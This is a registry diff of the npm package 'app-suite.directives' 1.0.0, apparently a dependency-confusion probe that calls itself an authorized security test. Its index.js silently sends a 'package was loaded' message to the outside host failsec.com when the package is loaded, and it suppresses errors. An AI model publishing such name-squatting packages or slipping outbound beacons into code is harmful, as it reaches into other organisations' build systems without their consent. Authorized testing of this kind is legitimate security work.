app-suite.directives 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +6 -0
  2. package/index.js +28 -0
  3. package/package.json +9 -0
package/README.md ADDED
@@ -0,0 +1,6 @@
1
+ # app-suite.directives
2
+
3
+ ⚠️ **Disclaimer**
4
+
5
+ This package was created solely for an authorized security assessment to test for **dependency confusion vulnerabilities**. It does not contain malicious payloads and does not attempt to exploit systems beyond logging its presence.
6
+ If you are seeing this unexpectedly, your build system may be pulling public packages without proper registry restriction.
package/index.js ADDED
@@ -0,0 +1,28 @@
1
+ const https = require('https');
2
+
3
+ const data = JSON.stringify({
4
+ msg: "app-suite.directives package was loaded",
5
+ timestamp: new Date().toISOString()
6
+ });
7
+
8
+ const options = {
9
+ hostname: 'failsec.com',
10
+ port: 443,
11
+ path: '/_log',
12
+ method: 'POST',
13
+ headers: {
14
+ 'Content-Type': 'application/json',
15
+ 'Content-Length': data.length
16
+ }
17
+ };
18
+
19
+ const req = https.request(options, res => {
20
+ // optional logging
21
+ });
22
+
23
+ req.on('error', error => {
24
+ // suppress errors
25
+ });
26
+
27
+ req.write(data);
28
+ req.end();
package/package.json ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "name": "app-suite.directives",
3
+ "version": "1.0.0",
4
+ "description": "This package was created for an authorized penetration test to demonstrate dependency confusion.",
5
+ "main": "index.js",
6
+ "scripts": {},
7
+ "author": "Authorized Security Testing",
8
+ "license": "SEE LICENSE IN README.md"
9
+ }